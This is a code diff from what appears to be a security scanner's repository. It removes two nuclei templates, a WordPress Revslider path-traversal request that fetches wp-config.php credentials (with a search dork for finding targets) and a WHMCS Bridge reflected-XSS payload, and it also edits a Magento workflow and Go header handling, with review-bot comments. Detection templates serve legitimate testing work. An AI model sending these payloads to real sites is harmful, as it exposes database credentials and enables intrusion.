    config/nuclei-templates/vulnerabilities/wordpress/wp-revslider-file-download.yaml
    1  -id: wp-revslider-file-download
    2  - 
    3  -info:
    4  - name: Wordpress Revslider - Local File Inclusion
    5  - author: pussycat0x
    6  - severity: high
    7  - description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
    8  - reference:
    9  - - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
    10  - - https://cxsecurity.com/issue/WLB-2021090129
    11  - classification:
    12  - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    13  - cvss-score: 7.5
    14  - cwe-id: CWE-22
    15  - metadata:
    16  - google-dork: inurl:/wp-content/plugins/revslider
    17  - tags: wordpress,wp-plugin,lfi,revslider
    18  - 
    19  -requests:
    20  - - method: GET
    21  - path:
    22  - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
    23  - - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
    24  - 
    25  - matchers-condition: and
    26  - matchers:
    27  - - type: word
    28  - part: body
    29  - words:
    30  - - "'DB_NAME'"
    31  - - "'DB_PASSWORD'"
    32  - - "'DB_USER'"
    33  - condition: and
    34  - 
    35  - - type: status
    36  - status:
    37  - - 200
    38  - 
    39  -# Enhanced by mp on 2022/07/29
    40  - 
    config/nuclei-templates/vulnerabilities/wordpress/wp-whmcs-xss.yaml
    1  -id: wp-whmcs-xss
    2  - 
    3  -info:
    4  - name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDk
    6  - severity: medium
    7  - description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
    8  - reference:
    9  - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
    10  - tags: wordpress,wp-plugin,authenticated,whmcs,xss
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - - |
    23  - GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
    24  - Host: {{Hostname}}
    25  - 
    26  - cookie-reuse: true
    27  - matchers-condition: and
    28  - matchers:
    29  - - type: word
    30  - part: body
    31  - words:
    32  - - "<strong><img src onerror=alert(document.domain)></strong>"
    33  - condition: and
    34  - 
    35  - - type: word
    36  - part: header
    37  - words:
    38  - - text/html
    39  - 
    40  - - type: status
    41  - status:
    42  - - 200
    43  - 
    config/nuclei-templates/workflows/magento-workflow.yaml
    skipped 7 lines
    8 8  workflows:
    9 9   - template: technologies/magento-detect.yaml
    10 10   subtemplates:
    11  - - template: exposures/configs/magento-config.yaml
    12  - - template: exposed-panels/magento-admin-panel.yaml
    13  - - template: vulnerabilities/magento/
     11 + - tags: magento
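Review bot: Replacing the three explicit subtemplates (old lines 11–13) with `- tags: magento` (new line 11) makes the workflow's coverage depend on tagging rather than paths: `exposed-panels/magento-admin-panel.yaml` and every template under `vulnerabilities/magento/` now run only if each carries the `magento` tag, and this diff does not show their tags, so each one needs checking or the change silently drops coverage. The renamed `exposures/configs/magento-config-disclosure.yaml` in this commit does carry `magento` (its line 14), so that one is covered. If `technologies/magento-detect.yaml` itself is tagged `magento`, the tag match presumably selects the parent template as its own subtemplate as well; confirm nuclei excludes it, or accept the duplicate run.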
  • lib/util/Const.go
    Binary file.
    pkg/naabu/v2/pkg/runner/runner.go
    skipped 78 lines
    79 79   var a []string
    80 80   a = append(a, httpxoptions.CustomHeaders...)
    81 81   opts["CustomHeaders"] = a
    82  - util.CustomHeaders = a
     82 + util.CustomHeaders = append(util.CustomHeaders, a...)
    83 83   }
    84 84   //var axx1 []*runner2.Runner
    85 85   defer func() { <-nucleiDone }()
    skipped 672 lines
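Review bot: `util.CustomHeaders = append(util.CustomHeaders, a...)` on new line 82 accumulates rather than replaces, so if this function runs more than once per process, or `util.CustomHeaders` already holds the same httpx headers, the identical header lines are sent repeatedly; nothing in the hunk de-duplicates. Line 81 still stores only `a` in `opts["CustomHeaders"]`, so the two views of the header list now diverge, which is worth a comment if intentional. Consider a linear scan over `util.CustomHeaders` before appending each entry of `a`, and record the intent with `// merge into the shared header list instead of overwriting it; skip entries already present`. The enclosing function starts and ends outside the hunk.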